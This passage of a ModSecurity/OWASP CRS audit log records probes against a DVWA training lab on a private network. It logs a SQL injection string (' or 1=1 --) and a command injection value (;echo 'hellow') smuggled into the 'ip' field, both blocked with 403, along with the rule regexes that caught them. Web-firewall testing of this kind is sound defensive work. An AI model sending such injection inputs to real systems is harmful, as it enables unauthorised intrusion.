\"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/\"] [unique_id \"WRc1lX8AAQEAAAkXs@gAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":416,"p2":1412,"p3":96,"p4":780,"p5":80,"sr":39,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:35 --0400","transaction_id":"WRc1m38AAQEAAAkYuFAAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1m38AAQEAAAkYuFAAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":382,"p2":1463,"p3":92,"p4":462,"p5":78,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:35 --0400","transaction_id":"WRc1m38AAQEAAAkYuFEAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1m38AAQEAAAkYuFEAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":388,"p2":1416,"p3":128,"p4":423,"p5":73,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:39 --0400","transaction_id":"WRc1n38AAQEAAAkYuFIAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":421,"p2":2224,"p3":0,"p4":0,"p5":137,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:44 --0400","transaction_id":"WRc1pH8AAQEAAAkYuFMAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1pH8AAQEAAAkYuFMAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":758,"p2":1947,"p3":198,"p4":761,"p5":124,"sr":30,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:44 --0400","transaction_id":"WRc1pH8AAQEAAAkYuFQAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1pH8AAQEAAAkYuFQAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":527,"p2":1898,"p3":102,"p4":397,"p5":96,"sr":28,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:51 --0400","transaction_id":"WRc1q38AAQEAAAkZ0BoAAAAE","remote_address":"192.168.75.153","remote_port":39274,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"37"},"body":["ip=%3Becho+%22hellow%22&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\x22hellow found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Pattern match \"(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\\"\\\\s]*(?:[\\\\w'\\\"\\\\./]+/|[\\\\\\\\'\\\"\\\\^]*\\\\w[\\\\\\\\'\\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\\"/\\\\\\\\]*\\\\\\\\)?[\\\"\\\\^]*(?:m[\\\"\\\\^]*(?:y[\\\"\\\\^]*s[\\\"\\\\^]*q[\\\"\\\\^]*l(?:[\\\"\\\\^]*(?:d[\\\"\\\\^]*u[\\\"\\\\^]*m[\\\"\\\\^]*p(?:[\\\"\\\\^]*s[\\\"\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag 